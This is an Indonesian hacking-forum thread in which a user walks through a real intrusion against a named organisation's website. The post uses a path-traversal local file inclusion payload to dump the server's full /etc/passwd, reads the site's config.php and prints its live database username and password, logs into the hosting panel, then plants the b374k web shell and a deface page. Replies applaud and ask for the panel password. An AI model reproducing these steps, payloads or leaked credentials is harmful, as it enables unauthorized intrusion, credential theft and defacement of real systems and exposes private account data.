[Tutor] From LFI+Backdoor+Deface (Newbie banget)

[cangcimen]

selamat malam teman-teman DC

malem ini ane mau coba praktekin tentang LFI (local file inclusion), sebenernya udah banyak juga sih di sini yang ngebahas tetang LFI, tapi ane mau coba lagi nge-refresh aja...
ane ijin sebelumnya buat admin DC

okeh langsung aja, LFI merupakan sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL, ada pun beberapa syarat yang kiranya mendukung serangan ini

Quote:include();
include_once();
require();
require_once();
dan konfigurasi server
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

sekarang kita coba praktekkan ini,
target : http://titiandamai.or.id/konten.php?nama...rt FES.pdf

terus kita ganti Miqdad -Final Report FES.pdf

Quote:../../../../../../../../../../../etc/passwd

maka nanti kita akan men-download file itu

Spoiler for: etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Debian-exim:x:100:102::/var/spool/exim4:/bin/false
statd:x:101:65534::/var/lib/nfs:/bin/false
identd:x:102:65534::/var/run/identd:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
s10002:x:1000:1000::/home/s10002:/bin/bash
s10003:x:1001:1001::/home/s10003:/bin/bash
s10005:x:1002:1002::/home/s10005:/bin/bash
s10009:x:1003:1003::/home/s10009:/bin/bash
s10010:x:1004:1004::/home/s10010:/bin/bash
s10016:x:1007:1007::/home/s10016:/bin/bash
s10019:x:1010:1010::/home/s10019:/bin/bash
s10020:x:1011:1011::/home/s10020:/bin/bash
s10022:x:1013:1013::/home/s10022:/bin/bash
s10027:x:1014:1014::/home/s10027:/bin/bash
s10029:x:1016:1016::/home/s10029:/bin/bash
s10030:x:1017:1017::/home/s10030:/bin/bash
s10031:x:1018:1018::/home/s10031:/bin/bash
s10032:x:1019:1019::/home/s10032:/bin/bash
spanel-cgi:x:1021:1028::/:/bin/bash
spanel-data:x:1022:1029::/home/spanel-data:/bin/bash
spanel-backup:x:1023:1030::/home/spanel-backup:/bin/bash
mysql:x:104:115:MySQL Server,,,:/var/lib/mysql:/bin/false
alias:x:64010:65534:qmail alias,,,:/var/qmail/alias:/bin/sh
qmaild:x:64011:65534:qmail daemon,,,:/var/qmail:/bin/sh
qmails:x:64012:64010:qmail send,,,:/var/qmail:/bin/sh
qmailr:x:64013:64010:qmail remote,,,:/var/qmail:/bin/sh
qmailq:x:64014:64010:qmail queue,,,:/var/qmail:/bin/sh
qmaill:x:64015:65534:qmail log,,,:/var/qmail:/bin/sh
qmailp:x:64016:65534:qmail pw,,,:/var/qmail:/bin/sh
bind:x:105:116::/var/cache/bind:/bin/false
ntp:x:106:117::/home/ntp:/bin/false
proftpd:x:107:65534::/var/run/proftpd:/bin/false
ftp:x:108:65534::/home/ftp:/bin/false
dnslog:x:109:65534:djbdns log user,,,:/var/log/dns:/bin/false
dnscache:x:110:65534:dnscache daemon,,,:/etc/dnscache:/bin/false
tinydns:x:111:65534:tinydns daemon,,,:/etc/tinydns:/bin/false
axfrdns:x:112:65534:axfrdns daemon,,,:/etc/axfrdns:/bin/false
clamav:x:113:118::/var/lib/clamav:/bin/false
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
server2403:x:1024:1031::/home/sloki/user/server2403/home:/bin/bash
cgi-server2403:x:1025:1031::/:/bin/false
h12273:x:1039:1040::/u/h12273/home:/c/bin/notifynoshell
cgi-h12273:x:1040:1040::/:/bin/false
h78649:x:1045:1043::/u/h78649/home:/c/bin/notifynoshell
cgi-h78649:x:1046:1043::/:/bin/false
h90547:x:1047:1044::/u/h90547/home:/c/bin/notifynoshell
cgi-h90547:x:1048:1044::/:/bin/false
h72019:x:1053:1047::/u/h72019/home:/c/bin/notifynoshell
cgi-h72019:x:1054:1047::/:/bin/false
h65690:x:1055:1048::/u/h65690/home:/bin/bash
cgi-h65690:x:1056:1048::/:/bin/false
h21758:x:1057:1049::/u/h21758/home:/c/bin/notifynoshell
cgi-h21758:x:1058:1049::/:/bin/false
h61460:x:1071:1056::/u/h61460/home:/c/bin/notifynoshell
cgi-h61460:x:1072:1056::/:/bin/false
h85875:x:1073:1057::/u/h85875/home:/bin/bash
cgi-h85875:x:1074:1057::/:/bin/false
h04394:x:1075:1058::/u/h04394/home:/c/bin/notifynoshell
cgi-h04394:x:1076:1058::/:/bin/false
h34833:x:1085:1063::/u/h34833/home:/c/bin/notifynoshell
cgi-h34833:x:1086:1063::/:/bin/false
h33047:x:1091:1066::/u/h33047/home:/bin/bash
cgi-h33047:x:1092:1066::/:/bin/false
h71205:x:1111:1076::/u/h71205/home:/bin/bash
cgi-h71205:x:1112:1076::/:/bin/false
h29411:x:1117:1079::/u/h29411/home:/c/bin/notifynoshell
cgi-h29411:x:1118:1079::/:/bin/false
h62973:x:1121:1081::/u/h62973/home:/c/bin/notifynoshell
cgi-h62973:x:1122:1081::/:/bin/false
h70486:x:1123:1082::/u/h70486/home:/c/bin/notifynoshell
cgi-h70486:x:1124:1082::/:/bin/false
h03408:x:1139:1090::/u/h03408/home:/c/bin/notifynoshell
cgi-h03408:x:1140:1090::/:/bin/false
h29387:x:1151:1096::/u/h29387/home:/c/bin/notifynoshell
cgi-h29387:x:1152:1096::/:/bin/false
h12481:x:1185:1113::/u/h12481/home:/bin/bash
cgi-h12481:x:1186:1113::/:/bin/false
h65178:x:1187:1114::/u/h65178/home:/c/bin/notifynoshell
cgi-h65178:x:1188:1114::/:/bin/false
h52908:x:42751:42718::/u/h52908/home:/c/bin/notifymigrating
cgi-h52908:x:42752:42718::/:/bin/false
h98412:x:42753:42719::/u/h98412/home:/c/bin/notifynoshell
cgi-h98412:x:42754:42719::/:/bin/false
h75683:x:42765:42725::/u/h75683/home:/bin/bash
cgi-h75683:x:42766:42725::/:/bin/false
h23761:x:42769:42727::/u/h23761/home:/c/bin/notifynoshell
cgi-h23761:x:42770:42727::/:/bin/false
h48911:x:42795:42740::/u/h48911/home:/bin/bash
cgi-h48911:x:42796:42740::/:/bin/false
h70412:x:42813:42749::/u/h70412/home:/c/bin/notifymigrated
cgi-h70412:x:42814:42749::/:/bin/false
h30899:x:42819:42752::/u/h30899/home:/c/bin/notifynoshell
cgi-h30899:x:42820:42752::/:/bin/false
h21318:x:42821:42753::/u/h21318/home:/c/bin/notifynoshell
cgi-h21318:x:42822:42753::/:/bin/false
h80746:x:42823:42754::/u/h80746/home:/c/bin/notifynoshell
cgi-h80746:x:42824:42754::/:/bin/false
h30198:x:42845:42765::/u/h30198/home:/c/bin/notifynoshell
cgi-h30198:x:42846:42765::/:/bin/false
h27753:x:42849:42767::/u/h27753/home:/c/bin/notifynoshell
cgi-h27753:x:42850:42767::/:/bin/false
h59332:x:42853:42769::/u/h59332/home:/c/bin/notifynoshell
cgi-h59332:x:42854:42769::/:/bin/false
h24770:x:42855:42770::/u/h24770/home:/c/bin/notifynoshell
cgi-h24770:x:42856:42770::/:/bin/false
h79618:x:42877:42781::/u/h79618/home:/c/bin/notifynoshell
cgi-h79618:x:42878:42781::/:/bin/false
h77316:x:42885:42785::/u/h77316/home:/bin/bash
cgi-h77316:x:42886:42785::/:/bin/false
h80346:x:42893:42789::/u/h80346/home:/c/bin/notifydisable
cgi-h80346:x:42894:42789::/:/bin/false
h04471:x:42903:42794::/u/h04471/home:/c/bin/notifynoshell
cgi-h04471:x:42904:42794::/:/bin/false
h34645:x:42909:42797::/u/h34645/home:/c/bin/notifynoshell
cgi-h34645:x:42910:42797::/:/bin/false
h60315:x:42915:42800::/u/h60315/home:/c/bin/notifynoshell
cgi-h60315:x:42916:42800::/:/bin/false
h22858:x:42949:42817::/u/h22858/home:/bin/bash
cgi-h22858:x:42950:42817::/:/bin/false
h16836:x:42959:42822::/u/h16836/home:/bin/bash
cgi-h16836:x:42960:42822::/:/bin/false
h83948:x:42971:42828::/u/h83948/home:/c/bin/notifynoshell
cgi-h83948:x:42972:42828::/:/bin/false
h97494:x:42977:42831::/u/h97494/home:/c/bin/notifynoshell
cgi-h97494:x:42978:42831::/:/bin/false
h83104:x:42981:42833::/u/h83104/home:/c/bin/notifynoshell
cgi-h83104:x:42982:42833::/:/bin/false
h71568:x:42993:42839::/u/h71568/home:/bin/bash
cgi-h71568:x:42994:42839::/:/bin/false
h64669:x:42995:42840::/u/h64669/home:/c/bin/notifynoshell
cgi-h64669:x:42996:42840::/:/bin/false
h83898:x:43003:42844::/u/h83898/home:/bin/bash
cgi-h83898:x:43004:42844::/:/bin/false
h05829:x:43023:42854::/u/h05829/home:/c/bin/notifynoshell
cgi-h05829:x:43024:42854::/:/bin/false
h52620:x:43025:42855::/u/h52620/home:/c/bin/notifynoshell
cgi-h52620:x:43026:42855::/:/bin/false
h02485:x:43031:42858::/u/h02485/home:/c/bin/notifynoshell
cgi-h02485:x:43032:42858::/:/bin/false
h89337:x:43049:42867::/u/h89337/home:/c/bin/notifymigrated
cgi-h89337:x:43050:42867::/:/bin/false
h54520:x:43059:42872::/u/h54520/home:/bin/bash
cgi-h54520:x:43060:42872::/:/bin/false
h09018:x:43063:42874::/u/h09018/home:/c/bin/notifynoshell
cgi-h09018:x:43064:42874::/:/bin/false
h25606:x:43067:42876::/u/h25606/home:/c/bin/notifynoshell
cgi-h25606:x:43068:42876::/:/bin/false
h58868:x:43069:42877::/u/h58868/home:/c/bin/notifynoshell
cgi-h58868:x:43070:42877::/:/bin/false
h25210:x:43075:42880::/u/h25210/home:/c/bin/notifynoshell
cgi-h25210:x:43076:42880::/:/bin/false
h93604:x:43083:42884::/u/h93604/home:/c/bin/notifynoshell
cgi-h93604:x:43084:42884::/:/bin/false
h57787:x:43085:42885::/u/h57787/home:/c/bin/notifynoshell
cgi-h57787:x:43086:42885::/:/bin/false
s10035:x:43087:43087::/home/s10035:/bin/bash
t90354:x:34340:34325::/u/t90354/home:/c/bin/notifydisable
cgi-t90354:x:43088:34325::/:/bin/false
s10037:x:43090:43090::/home/s10037:/bin/bash
s10038:x:43091:43091::/home/s10038:/bin/bash
server42403:x:43106:43106::/home/sloki/user/server42403/home:/bin/bash
cgi-server42403:x:43107:43106::/:/bin/false
s10039:x:43108:43108::/home/s10039:/bin/bash
h12160:x:43109:43109::/u/h12160/home:/c/bin/notifynoshell
cgi-h12160:x:43110:43109::/:/bin/false
h78746:x:43131:43120::/u/h78746/home:/c/bin/notifydisable
cgi-h78746:x:43132:43120::/:/bin/false
pdns:x:115:121:PowerDNS,,,:/var/spool/powerdns:/bin/false
h06229:x:43137:43123::/u/h06229/home:/c/bin/notifynoshell
cgi-h06229:x:43138:43123::/:/bin/false
h26502:x:43139:43124::/u/h26502/home:/c/bin/notifynoshell
cgi-h26502:x:43140:43124::/:/bin/false
libuuid:x:116:122::/var/lib/libuuid:/bin/sh
h53424:x:43143:43143::/u/h53424/home:/c/bin/notifynoshell
cgi-h53424:x:43144:100::/:/bin/false
h88762:x:43147:43147::/u/h88762/home:/c/bin/notifynoshell
cgi-h88762:x:43148:100::/:/bin/false
s10040:x:43149:43149::/home/s10040:/bin/bash
s10041:x:43150:43150::/home/s10041:/bin/bash
h52354:x:43155:43155::/u/h52354/home:/c/bin/notifynoshell
cgi-h52354:x:43156:100::/:/bin/false
h34010:x:43165:43165::/u/h34010/home:/c/bin/notifynoshell
cgi-h34010:x:43166:100::/:/bin/false
h10917:x:43195:43195::/u/h10917/home:/c/bin/notifynoshell
cgi-h10917:x:43196:100::/:/bin/false
h57984:x:43199:43199::/u/h57984/home:/bin/bash
cgi-h57984:x:43200:100::/:/bin/false
h44050:x:43201:43201::/u/h44050/home:/c/bin/notifynoshell
cgi-h44050:x:43202:100::/:/bin/false
h15603:x:43219:43219::/u/h15603/home:/c/bin/notifynoshell
cgi-h15603:x:43220:100::/:/bin/false
h72463:x:43221:43221::/u/h72463/home:/bin/bash
cgi-h72463:x:43222:100::/:/bin/false
h98593:x:43227:43227::/u/h98593/home:/c/bin/notifynoshell
cgi-h98593:x:43228:100::/:/bin/false
h25152:x:43231:43231::/u/h25152/home:/bin/bash
cgi-h25152:x:43232:100::/:/bin/false
h58089:x:43235:43235::/u/h58089/home:/c/bin/notifynoshell
cgi-h58089:x:43236:100::/:/bin/false
h95034:x:43237:43237::/u/h95034/home:/c/bin/notifynoshell
cgi-h95034:x:43238:100::/:/bin/false
h37344:x:43241:43241::/u/h37344/home:/c/bin/notifynoshell
cgi-h37344:x:43242:100::/:/bin/false
h36468:x:43245:43245::/u/h36468/home:/c/bin/notifynoshell
cgi-h36468:x:43246:100::/:/bin/false
h30192:x:34002:34002::/u/h30192/home:/bin/bash
cgi-h30192:x:43252:100::/:/bin/false
h91067:x:43255:43255::/u/h91067/home:/c/bin/notifynoshell
cgi-h91067:x:43256:100::/:/bin/false
h56351:x:43265:43265::/u/h56351/home:/c/bin/notifynoshell
cgi-h56351:x:43266:100::/:/bin/false
h83201:x:35726:35726::/u/h83201/home:/bin/bash
cgi-h83201:x:43273:100::/:/bin/false
h30205:x:43276:43276::/u/h30205/home:/c/bin/notifydisable
cgi-h30205:x:43277:100::/:/bin/false
h76606:x:43306:43306::/u/h76606/home:/c/bin/notifynoshell
cgi-h76606:x:43307:100::/:/bin/false
h72303:x:43308:43308::/u/h72303/home:/c/bin/notifynoshell
cgi-h72303:x:43309:100::/:/bin/false
h58850:x:43310:43310::/u/h58850/home:/bin/bash
cgi-h58850:x:43311:100::/:/bin/false
h43653:x:43318:43318::/u/h43653/home:/c/bin/notifynoshell
cgi-h43653:x:43319:100::/:/bin/false
h88948:x:43325:43325::/u/h88948/home:/c/bin/notifynoshell
cgi-h88948:x:43326:100::/:/bin/false
h69452:x:43331:43331::/u/h69452/home:/c/bin/notifydisable
cgi-h69452:x:43332:100::/:/bin/false
h93955:x:43343:43343::/u/h93955/home:/c/bin/notifydisable
cgi-h93955:x:43344:100::/:/bin/false
h34580:x:43351:43351::/u/h34580/home:/c/bin/notifydisable
cgi-h34580:x:43352:100::/:/bin/false
h94186:x:43353:43353::/u/h94186/home:/c/bin/notifynoshell
cgi-h94186:x:43354:100::/:/bin/false
h33073:x:43365:43365::/u/h33073/home:/c/bin/notifymigrated
cgi-h33073:x:43366:100::/:/bin/false
h36331:x:43375:43375::/u/h36331/home:/c/bin/notifynoshell
cgi-h36331:x:43376:100::/:/bin/false
h77388:x:43381:43381::/u/h77388/home:/c/bin/notifydisable
cgi-h77388:x:43382:100::/:/bin/false
h56758:x:43397:43397::/u/h56758/home:/c/bin/notifynoshell
cgi-h56758:x:43398:100::/:/bin/false
h15941:x:43405:43405::/u/h15941/home:/c/bin/notifynoshell
cgi-h15941:x:43406:100::/:/bin/false
h18164:x:43407:43407::/u/h18164/home:/c/bin/notifynoshell
cgi-h18164:x:43408:100::/:/bin/false
s10042:x:43409:43409::/home/s10042:/bin/bash
h48868:x:43410:43410::/u/h48868/home:/bin/bash
cgi-h48868:x:43411:100::/:/bin/false
h01778:x:43414:43414::/u/h01778/home:/c/bin/notifynoshell
cgi-h01778:x:43415:100::/:/bin/false
h50253:x:43416:43416::/u/h50253/home:/bin/bash
cgi-h50253:x:43417:100::/:/bin/false
k3078043:x:43420:43420::/u/k3078043/home:/c/bin/notifynoshell
cgi-k3078043:x:43421:100::/:/bin/false
h51242:x:43428:43428::/u/h51242/home:/c/bin/notifynoshell
cgi-h51242:x:43429:100::/:/bin/false
k2001502:x:43436:43436::/u/k2001502/home:/c/bin/notifynoshell
cgi-k2001502:x:43437:100::/:/bin/false
s10043:x:43438:43438::/home/s10043:/bin/bash
k8099532:x:43441:43441::/u/k8099532/home:/c/bin/notifynoshell
cgi-k8099532:x:43442:100::/:/bin/false
k2938029:x:43443:43443::/u/k2938029/home:/bin/bash
cgi-k2938029:x:43444:100::/:/bin/false
k3885104:x:43445:43445::/u/k3885104/home:/c/bin/notifynoshell
cgi-k3885104:x:43446:100::/:/bin/false
s10044:x:43447:43447:staff:/home/s10044:/bin/bash
s10045:x:43448:43448:staff:/home/s10045:/bin/bash
k6447514:x:43449:43449::/u/k6447514/home:/c/bin/notifynoshell
cgi-k6447514:x:43450:100::/:/bin/false
k5593384:x:43451:43451::/u/k5593384/home:/c/bin/notifynoshell
cgi-k5593384:x:43452:100::/:/bin/false
k0640465:x:43455:43455::/u/k0640465/home:/c/bin/notifynoshell
cgi-k0640465:x:43456:100::/:/bin/false
k0114658:x:43457:43457::/u/k0114658/home:/c/bin/notifynoshell
cgi-k0114658:x:43458:100::/:/bin/false
k2569560:x:43467:43467::/u/k2569560/home:/c/bin/notifynoshell
cgi-k2569560:x:43468:100::/:/bin/false
k3835574:x:43469:43469::/u/k3835574/home:/c/bin/notifynoshell
cgi-k3835574:x:43470:100::/:/bin/false
k9049361:x:43471:43471::/u/k9049361/home:/c/bin/notifynoshell
cgi-k9049361:x:43472:100::/:/bin/false
k6602400:x:43475:43475::/u/k6602400/home:/c/bin/notifynoshell
cgi-k6602400:x:43476:100::/:/bin/false
k9436481:x:43479:43479::/u/k9436481/home:/bin/bash
cgi-k9436481:x:43480:100::/:/bin/false
k5738417:x:43487:43487::/u/k5738417/home:/c/bin/notifynoshell
cgi-k5738417:x:43488:100::/:/bin/false
k5896211:x:43489:43489::/u/k5896211/home:/c/bin/notifynoshell
cgi-k5896211:x:43490:100::/:/bin/false
k0426108:x:43499:43499::/u/k0426108/home:/c/bin/notifynoshell
cgi-k0426108:x:43500:100::/:/bin/false
k9462480:x:43501:43501::/u/k9462480/home:/c/bin/notifynoshell
cgi-k9462480:x:43502:100::/:/bin/false
k6976644:x:43505:43505::/u/k6976644/home:/c/bin/notifynoshell
cgi-k6976644:x:43506:100::/:/bin/false
k4063110:x:43217:43217::/u/k4063110/home:/c/bin/notifynoshell
cgi-k4063110:x:43218:100::/:/bin/false
h36341:x:42861:42773::/u/h36341/home:/c/bin/notifynoshell
cgi-h36341:x:42862:42773::/:/bin/false
k9555722:x:43513:43513::/u/k9555722/home:/c/bin/notifynoshell
cgi-k9555722:x:43514:100::/:/bin/false
k4574099:x:43515:43515::/u/k4574099/home:/c/bin/notifymigrated
cgi-k4574099:x:43516:100::/:/bin/false
k8246976:x:43521:43521::/u/k8246976/home:/c/bin/notifynoshell
cgi-k8246976:x:43522:100::/:/bin/false
k2469340:x:43523:43523::/u/k2469340/home:/bin/bash
cgi-k2469340:x:43524:100::/:/bin/false
k2331160:x:43527:43527::/u/k2331160/home:/bin/bash
cgi-k2331160:x:43528:100::/:/bin/false
k3616801:x:43535:43535::/u/k3616801/home:/c/bin/notifynoshell
cgi-k3616801:x:43536:100::/:/bin/false
k3783041:x:43537:43537::/u/k3783041/home:/bin/bash
cgi-k3783041:x:43538:100::/:/bin/false
k4655358:x:43541:43541::/u/k4655358/home:/c/bin/notifynoshell
cgi-k4655358:x:43542:100::/:/bin/false
k1334207:x:43551:43551::/u/k1334207/home:/bin/bash
cgi-k1334207:x:43552:100::/:/bin/false
k3965749:x:43553:43553::/u/k3965749/home:/c/bin/notifynoshell
cgi-k3965749:x:43554:100::/:/bin/false
k3039929:x:43557:43557::/u/k3039929/home:/c/bin/notifynoshell
cgi-k3039929:x:43558:100::/:/bin/false
k3640898:x:43559:43559::/u/k3640898/home:/c/bin/notifynoshell
cgi-k3640898:x:43560:100::/:/bin/false
k4152945:x:43561:43561::/u/k4152945/home:/bin/bash
cgi-k4152945:x:43562:100::/:/bin/false
irmadewi:x:43563:43563::/u/irmadewi/home:/c/bin/notifydisable
cgi-irmadewi:x:43564:100::/:/bin/false
cluesolu:x:43567:43567::/u/cluesolu/home:/c/bin/notifydisable
cgi-cluesolu:x:43568:100::/:/bin/false
k7677544:x:43569:43569::/u/k7677544/home:/bin/bash
cgi-k7677544:x:43570:100::/:/bin/false
rajutcoi:x:43579:43579::/u/rajutcoi/home:/c/bin/notifydisable
cgi-rajutcoi:x:43580:100::/:/bin/false
logampin:x:43581:43581::/u/logampin/home:/bin/bash
cgi-logampin:x:43582:100::/:/bin/false
h70300:x:35646:35646::/u/h70300/home:/c/bin/notifymigrated
cgi-h70300:x:35647:100::/:/bin/false
epestele:x:43585:43585::/u/epestele/home:/c/bin/notifydisable
cgi-epestele:x:43586:100::/:/bin/false
topbonus:x:43587:43587::/u/topbonus/home:/c/bin/notifydisable
cgi-topbonus:x:43588:100::/:/bin/false
paniisco:x:43589:43589::/u/paniisco/home:/c/bin/notifynoshell
cgi-paniisco:x:43590:100::/:/bin/false
s10048:x:43595:43595::/home/s10048:/bin/bash
s10049:x:43596:43596::/home/s10049:/bin/bash
s10050:x:43597:43597::/home/s10050:/bin/bash
k8492651:x:43598:43598::/u/k8492651/home:/c/bin/notifynoshell
cgi-k8492651:x:43599:100::/:/bin/false
s10051:x:43600:43600::/home/s10051:/bin/sh
s10052:x:43601:43601::/home/s10052:/bin/bash
enviroca:x:43602:43602::/u/enviroca/home:/c/bin/notifynoshell
cgi-enviroca:x:43603:100::/:/bin/false
k1214217:x:43605:43605::/u/k1214217/home:/c/bin/notifynoshell
cgi-k1214217:x:43606:100::/:/bin/false
k5970405:x:43607:43607::/u/k5970405/home:/c/bin/notifynoshell
cgi-k5970405:x:43608:100::/:/bin/false
k4301708:x:43609:43609::/u/k4301708/home:/c/bin/notifynoshell
cgi-k4301708:x:43610:100::/:/bin/false
k8128814:x:43611:43611::/u/k8128814/home:/c/bin/notifynoshell
cgi-k8128814:x:43612:100::/:/bin/false
k1068705:x:43613:43613::/u/k1068705/home:/c/bin/notifynoshell
cgi-k1068705:x:43614:100::/:/bin/false
s24219:x:43615:43615::/home/s24219:/bin/sh
k6038342:x:43616:43616::/u/k6038342/home:/c/bin/notifynoshell
cgi-k6038342:x:43617:100::/:/bin/false
k4264473:x:43618:43618::/u/k4264473/home:/c/bin/notifynoshell
cgi-k4264473:x:43619:100::/:/bin/false
kenkotec:x:43620:43620::/u/kenkotec/home:/c/bin/notifynoshell
cgi-kenkotec:x:43621:100::/:/bin/false
k9232420:x:43622:43622::/u/k9232420/home:/c/bin/notifynoshell
cgi-k9232420:x:43623:100::/:/bin/false
s10057:x:43624:43624:staff:/home/s10057:/bin/bash
s10058:x:43625:43625:staff:/home/s10058:/bin/bash
audiocen:x:43868:43868::/u/audiocen/home:/c/bin/notifynoshell
cgi-audiocen:x:43869:100::/:/bin/false
k7124209:x:43543:43543::/u/k7124209/home:/c/bin/notifynoshell
cgi-k7124209:x:43544:100::/:/bin/false
s10059:x:43870:43870:staff:/home/s10059:/bin/bash
k9079668:x:43873:43873::/u/k9079668/home:/c/bin/notifynoshell
cgi-k9079668:x:43874:100::/:/bin/false
s10060:x:43875:43875:staff:/home/s10060:/bin/bash
s10061:x:43876:43876:staff:/home/s10061:/bin/bash
s10062:x:43877:43877:staff:/home/s10062:/bin/bash
k5807247:x:43878:43878::/u/k5807247/home:/c/bin/notifymigrated
cgi-k5807247:x:43879:100::/:/bin/false
k0120309:x:44900:44900::/u/k0120309/home:/c/bin/notifynoshell
cgi-k0120309:x:44901:100::/:/bin/false
s10063:x:44902:44902:staff:/home/s10063:/bin/bash
s10064:x:44903:44903:staff:/home/s10064:/bin/bash
k0006389:x:44904:44904::/u/k0006389/home:/c/bin/notifynoshell
cgi-k0006389:x:44905:100::/:/bin/false
k1635307:x:44906:44906::/u/k1635307/home:/c/bin/notifynoshell
cgi-k1635307:x:44907:100::/:/bin/false
k6600110:x:44908:44908::/u/k6600110/home:/c/bin/notifynoshell
cgi-k6600110:x:44909:100::/:/bin/false
k6838494:x:44910:44910::/u/k6838494/home:/c/bin/notifynoshell
cgi-k6838494:x:44911:100::/:/bin/false
k7449141:x:44912:44912::/u/k7449141/home:/c/bin/notifynoshell
cgi-k7449141:x:44913:100::/:/bin/false
k7955014:x:44914:44914::/u/k7955014/home:/c/bin/notifynoshell
cgi-k7955014:x:44915:100::/:/bin/false
k9591954:x:44916:44916::/u/k9591954/home:/c/bin/notifynoshell
cgi-k9591954:x:44917:100::/:/bin/false
k0519824:x:44918:44918::/u/k0519824/home:/c/bin/notifynoshell
cgi-k0519824:x:44919:100::/:/bin/false
k7724118:x:44920:44920::/u/k7724118/home:/c/bin/notifynoshell
cgi-k7724118:x:44921:100::/:/bin/false
k3112242:x:44922:44922::/u/k3112242/home:/c/bin/notifynoshell
cgi-k3112242:x:44923:100::/:/bin/false
k4746423:x:44924:44924::/u/k4746423/home:/c/bin/notifynoshell
cgi-k4746423:x:44925:100::/:/bin/false
k6098695:x:44926:44926::/u/k6098695/home:/c/bin/notifymigrated
cgi-k6098695:x:44927:100::/:/bin/false
k7929737:x:44928:44928::/u/k7929737/home:/c/bin/notifynoshell
cgi-k7929737:x:44929:100::/:/bin/false
k9844893:x:44930:44930::/u/k9844893/home:/c/bin/notifynoshell
cgi-k9844893:x:44931:100::/:/bin/false
k9487357:x:44932:44932::/u/k9487357/home:/bin/bash
cgi-k9487357:x:44933:100::/:/bin/false
k9407991:x:44934:44934::/u/k9407991/home:/c/bin/notifynoshell
cgi-k9407991:x:44935:100::/:/bin/false
k0058418:x:44936:44936::/u/k0058418/home:/c/bin/notifynoshell
cgi-k0058418:x:44937:100::/:/bin/false
k4815503:x:44938:44938::/u/k4815503/home:/c/bin/notifynoshell
cgi-k4815503:x:44939:100::/:/bin/false
k5269028:x:44940:44940::/u/k5269028/home:/c/bin/notifynoshell
cgi-k5269028:x:44941:100::/:/bin/false
k2456504:x:44942:44942::/u/k2456504/home:/c/bin/notifynoshell
cgi-k2456504:x:44943:100::/:/bin/false
k7321389:x:44944:44944::/u/k7321389/home:/c/bin/notifynoshell
cgi-k7321389:x:44945:100::/:/bin/false

setelah itu kital liat file configurasinya

Quote:../../../../../../../../../../../home/sloki/user/h15941/sites/titiandamai.or.id/www/config.php

PHP Code:

$dbhost = "localhost";
$dbuname = "h15941_itp";
$dbpass = "kajoku1275";
$dbname = "h15941_itp";
$prefix = "itp";
$user_prefix = "itp";
$dbtype = "MySQL"; 


kenapa itu bisa terjadi?... awalnya ane bingung, tapi pas ane coba sedikir pelajarin dari script php yang berhasil ane download dari target, terdapat vuln di

Spoiler:

PHP Code:

function download_http($nama_file){
           
  global $prefix, $dbi;    

  $path_to_file = "file/riset/$nama_file";
  if($nama_file != ""){  
     if (file_exists($path_to_file)) {           
         Header('Content-type: aperdalication/force-download');
         Header('Content-Disposition: attachment; filename=' . "$nama_file");      
         $fd = fopen ($path_to_file, "rb");
         $contents = fread ($fd, filesize ($path_to_file));
         fclose ($fd);    
         print $contents;   
     }else{           
     //file tidak ada           
     }//end if
  }else{
        Header("Location: konten.php?nama=Riset&op=index_riset");
  }//end if

}//end download_http 


mudah-mudahan bener itu terdapat vuln

okeh karena kita udah ngedapetin file configurasi, sekarang kita coba login panel-nya.
sebelumnya ane scan dulu itu target, untuk ngeliat port dan service yang open, setelah ane scan wew ada service https yang open, boleh jadi ini halaman login.
sekarang kita test url jadi seperti ini
https://titiandamai.or.id/
okeh ternyata menggunakan sPanel
sekarang kita coba login ke sPanel

Spoiler:

kita bisa masuk

Spoiler:

jalan-jalan deh

Spoiler:

untuk upload backdoor b374k

Spoiler:

perview :
b374k = [url] http://titiandamai.or.id/index2.php[/url]
belajar pepes = http://titiandamai.or.id/index.html

terimakasih atas perhatiannya temen-temen maafin ane kalo ada salah-salah kata ya om..

I Love Devilzc0de

Spoiler:

terima kasih juga buat om slopot dan om vendetta

[SaccaFrazi]

Bagus Om POCnya!!
Mantap..

[rydisturbed]

Mantapp !!! ane da tess.....btw pake app apa biar bisa deteksi LFI nya

[cangcimen]

heheehe ene masih belajar om

waduh kebetulan ane ngga pake scan LFI om, cuma kebetulan aja

[milanesti]

wew.. manstap om

[cangcimen]

(02-03-2012 11:25 PM)milanesti Wrote:  wew.. manstap om

makasih om

[Killu4]

Mantep tutornya kak,coba ane pelajari dlu yaa

[cangcimen]

(02-03-2012 11:30 PM)Killu4 Wrote:  Mantep tutornya kak,coba ane pelajari dlu yaa

siap om killu nanti kita share bareng lagi ya

[SaccaFrazi]

Om
Share Pass Spanel,boleh?

[ketek]

mantap ni om cangcimen